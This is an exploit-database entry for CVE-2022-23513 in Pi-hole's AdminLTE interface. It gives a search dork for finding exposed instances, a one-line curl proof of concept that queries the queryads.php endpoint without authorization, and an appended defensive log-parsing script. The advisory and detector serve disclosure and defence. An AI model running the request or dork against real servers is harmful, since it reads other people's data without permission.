AdminLTE PiHole < 5.18 – Broken Access Control

  • Author: kv1to
    Date: 2023-09-04
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/51705/
  • # Exploit Title: AdminLTE PiHole < 5.18 - Broken Access Control
    # Google Dork: [inurl:admin/scripts/pi-hole/phpqueryads.php](https://vuldb.com/?exploit_googlehack.216554)
    # Date: 21.12.2022
    # Exploit Author: kv1to
    # Version: Pi-hole v5.14.2; FTL v5.19.2; Web Interface v5.17
    # Tested on: Raspbian / Debian
    # Vendor: https://github.com/pi-hole/AdminLTE/security/advisories/GHSA-6qh8-6rrj-7497
    # CVE : CVE-2022-23513
    
    In an attack, the threat actor can perform an unauthorized query for blocked domains on the queryads endpoint.
    
    ## Proof Of Concept with curl:
    curl 'http://pi.hole/admin/scripts/pi-hole/php/queryads.php?domain=<searchquery>'
    
    ## HTTP requests
    GET /admin/scripts/pi-hole/php/queryads.php?domain=<searchquery> HTTP/1.1
    HOST: pi.hole
    Cookie: [..SNIPPED..]
    [..SNIPPED..]
    
    ## HTTP Response
    HTTP/1.1 200 OK
    [..SNIPPED..]
    
    data: Match found in [..SNIPPED..]
    data: <domain>
    data: <domain>
    data: <domain>
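
For defenders, requests like the one above can be found in the web server's access log. The following is an added example, not part of the original advisory or of Pi-hole's code: it assumes the log is in Common/Combined Log Format, the `trusted_clients` parameter is a hypothetical allow-list of admin workstations, and the sample log lines are constructed. An access log does not record whether a session was valid, so every hit from a client outside the allow-list is reported for review.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint path taken from the advisory's proof of concept.
QUERYADS_PATH = "/admin/scripts/pi-hole/php/queryads.php"

# Assumed layout: Common/Combined Log Format (client IP first, quoted request line).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_queryads_hits(lines, trusted_clients=frozenset()):
    """Return {client_ip: [(timestamp, status, searched_domain), ...]} for
    requests to queryads.php from clients outside trusted_clients."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the assumed format
        url = urlsplit(m["target"])
        # Decode the path so percent-encoded variants of the endpoint still match.
        if unquote(url.path) != QUERYADS_PATH or m["ip"] in trusted_clients:
            continue
        # parse_qs URL-decodes the value; a missing parameter is recorded as "".
        domain = parse_qs(url.query, keep_blank_values=True).get("domain", [""])[0]
        hits[m["ip"]].append((m["ts"], int(m["status"]), domain))
    return dict(hits)

# Constructed sample log lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Dec/2022:10:00:01 +0000] "GET /admin/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [21/Dec/2022:10:00:05 +0000] "GET /admin/scripts/pi-hole/php/queryads.php?domain=ads.example HTTP/1.1" 200 310 "-" "curl/7.74.0"',
    '198.51.100.7 - - [21/Dec/2022:10:00:06 +0000] "GET /admin/scripts/pi-hole/php/queryads.php?domain=track%2Eexample HTTP/1.1" 200 120 "-" "curl/7.74.0"',
    '192.0.2.10 - - [21/Dec/2022:10:01:00 +0000] "GET /admin/scripts/pi-hole/php/queryads.php?domain=cdn.example HTTP/1.1" 200 98 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    # 192.0.2.10 plays the role of the admin workstation in this constructed sample.
    for ip, events in find_queryads_hits(SAMPLE_LOG, {"192.0.2.10"}).items():
        for ts, status, domain in events:
            print(f"{ip} [{ts}] status={status} domain={domain!r}")
```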